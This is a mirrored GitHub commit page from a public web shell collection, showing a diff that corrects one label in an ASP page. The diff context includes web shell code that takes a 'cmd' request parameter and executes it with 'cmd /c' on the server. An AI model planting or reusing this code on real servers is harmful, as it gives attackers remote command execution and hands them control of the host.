1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00

Merge pull request #38 from RobinvandenHurk/patch-1

Fixed label
This commit is contained in:
tennc
2020-10-22 23:26:08 +08:00
committed by GitHub

View File

@@ -39,7 +39,7 @@ end Function
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's software:</b>
<b>The server's local address:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)